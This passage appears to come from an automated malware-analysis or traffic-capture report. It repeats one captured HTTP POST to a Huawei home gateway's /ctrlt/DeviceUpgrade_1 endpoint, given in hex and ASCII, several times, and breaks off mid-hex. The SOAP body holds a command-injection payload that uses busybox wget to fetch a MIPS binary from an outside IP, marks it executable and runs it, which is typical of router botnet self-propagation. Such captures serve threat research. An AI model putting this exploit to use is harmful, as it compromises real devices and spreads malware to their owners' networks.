74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 